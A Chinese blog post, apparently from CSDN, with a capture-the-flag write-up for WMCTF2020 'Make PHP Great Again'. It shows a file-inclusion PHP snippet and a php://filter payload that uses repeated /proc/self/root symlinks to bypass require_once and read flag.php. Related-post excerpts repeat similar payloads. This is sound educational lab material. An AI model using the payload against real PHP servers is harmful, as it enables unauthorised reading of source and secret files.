[WMCTF2020]Make PHP Great Again

最新推荐文章于 2024-09-22 19:58:18 发布
最新推荐文章于 2024-09-22 19:58:18 发布
阅读量227 收藏
点赞数
分类专栏: ctf web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jvkyvly/article/details/119845467
版权
ctf 同时被 2 个专栏收录
31 篇文章 1 订阅
订阅专栏
web
26 篇文章 0 订阅
订阅专栏

预期

<?php
highlight_file(__FILE__);
require_once 'flag.php';
if(isset($_GET['file'])) {
  require_once $_GET['file'];
}

在php中,require_once在调用时php会检查该文件是否已经被包含过,如果是则不会再次包含,也不会包含当前文件(就是这题index.php不会包含index.php和flag.php)

PHP最新版的小Trick, require_once包含的软链接层数较多时once的hash匹配会直接失效造成重复包含
参考
/proc/self/root/是指向/的符号链接
payload:
?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php

非预期 session文件包含,条件竞争

Je3Z
关注
专栏目录
buu-[WMCTF2020]Make PHP Great Again
qaq517384的博客
10-26 277
考点: 绕过require_once() 打开环境就是源码 <?php highlight_file(__FILE__); require_once 'flag.php'; if(isset($_GET['file'])) { require_once $_GET['file']; } 第一反应是去百度绕过require_once(),毕竟见识小,小本本记一下 php源码分析 require_once 绕过不能重复包含文件的限制 /root/proc/self再多放几个也不是问题 payloa
wmctf2020 Make PHP Great Again
snowlyzz的博客
09-14 313
一题双解
[WMCTF2020]Make PHP Great Again 2.01
最新发布
alwtj的博客
09-22 792
又是php代码审计,开始吧.这不用审吧,啊喂.意思就是我们要利用require_once()函数和传入的file的value去读取flag的内容.,貌似呢require_once()已经被用过一次了,直接读取还不行,看一下下面的知识点.
[WMCTF2020]Make PHP Great Again 2.0
nigo134的博客
06-18 626
进入页面给出代码 这里有个require_once()函数需要了解一下,如果require_once包含过一次flag.php再次出现则不会执行发现require文件时,在对软链接的操作上存在一些缺陷,似乎并不会进行多次解析获取真实路径。/proc/self指向当前进程的/proc/pid/ /proc/self/root/是指向/的符号链接使用伪协议来读取flag,构造payload: ?file=php://filter/read=convert.base64-encode/resource=/pr
Make Python great again.zip
07-09
Make Python great again
Make the Web Great Again!-crx插件
04-06
语言:English 扩展网络功能的扩展! 如果您渴望使用老式的Trump-Pence徽标,可以通过此Chrome扩展程序将其重新使用。 它将用原始的Trump-Pence徽标替换引用“ Trump”或“ Pence”的图像。
Make GitHub Great Again-crx插件
04-02
语言:English 扩展再次制作github! 让您的旧github回来。 删除新的黑暗TopBar。 https://github.com/dennissnijder/makegithubgreatagain
Make V1 Great Again-crx插件
03-24
V1糟透了,因此请尝试减轻痛苦。 支持语言:English
[WMCTF2020]Make PHP Great Again非预期解原因
azraelxuemo的博客
12-01 446
当时这个题出现了一个这样的非预期解 ?file=php://filter/convert.base64-encode/resource=/nice/../../proc/self/cwd/flag.php 以及这样回失败 ?file=php://filter/convert.base64-encode/resource=/proc/self/cwd/flag.php 这里涉及php这样的一个trunk,我是调试源码发现的 环境配置 unsucess.php <?php include "flag.
[WMCTF2020]Make PHP Great Again 软连接绕过
qq_54929891的博客
05-23 934
<?php highlight_file(__FILE__); require_once 'flag.php'; if(isset($_GET['file'])) { require_once $_GET['file']; } 打开题目一看,这么几行代码,就这? 话不多说直接伪协议读取flag.php php://filter/read=convert.base64-encode/resource=flag.php 欸嘿,啥都没出来,也没报错说什么有过滤??或许这个函数有可能不一样,去.
[WMCTF2021]Make PHP Great Again And Again
feng的博客
10-27 581
前言 也是很久之前WMCTF2021中Web的一道题目,当时一点头绪都没有,然后也没有复现,今天晚上跟着赵总的博客进行了学习,也是学习到了非常多的东西。本文只是跟着赵总的博客进行了一波复现,记录下来,仅此而已。 题目环境 题目本身给了shell,但是有着诸多的限制,包括disable_functions,open_basedir,flag文件是700等。 而且不出网,流量是nginx转发进内网。 考虑到是nginx+php-fpm,联想到之前蓝帽杯的那题,很正常会想到利用ftp的被动模式攻击fpm实现恶意加
BUUCTF--[WMCTF2020]Make PHP Great Again
qq_46263951的博客
08-11 1196
进入页面后给出一段代码 <?php highlight_file(__FILE__); require_once 'flag.php'; if(isset($_GET['file'])) { require_once $_GET['file']; } 这里有一个require_once函数之前没有见过 require_once语句和 require 语句完全相同,唯一区别是 PHP 会检查该文件是否已经被包含过,如果是则不会再次包含。 equire_once() 为了避免重复加载..
BUUCTF--[WMCTF2020]Make PHP Great Again 2.0
qq_46263951的博客
08-18 668
进入页面给出代码 <?php highlight_file(__FILE__); require_once 'flag.php'; if(isset($_GET['file'])) { require_once $_GET['file']; } 这里有个require_once()函数需要了解一下,如果require_once包含过一次flag.php再次出现则不会执行 发现require文件时,在对软链接的操作上存在一些缺陷,似乎并不会进行多次解析获取真实路径。 /proc/sel..
[WMCTF2020]Make PHP Great Again require_once 特性
m0_64180167的博客
12-08 574
这里是特性我们首先来解释一下这个是我们的源代码。
-------已搬运--------BUUCTF:WMCTF2020]Make PHP Great Again --文件包含 --- require_once php7.4 的trick
Zero_Adam的博客
05-03 656
一、自己做: 代码简单, <?php highlight_file(__FILE__); require_once 'flag.php'; if(isset($_GET['file'])) { require_once $_GET['file']; } 用filter读取,能够读取到file=../../../../../etc/passwd。用上filter等等,就是读取不到flag.php。 然后我就想到了之前的 文件包含漏洞的。那个上传一个文件,然后包含自己,使得PHP程序运行不完,然后临
Linux编程:深入理解make命令
"这篇资源主要介绍了Linux编程中的`make`命令,它是一个自动化构建工具,用于管理和编译大型项目中的多个源文件。`make`命令根据程序员编写的Makefile文件来决定哪些文件需要重新编译,以此提高开发效率。" 在Linux...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值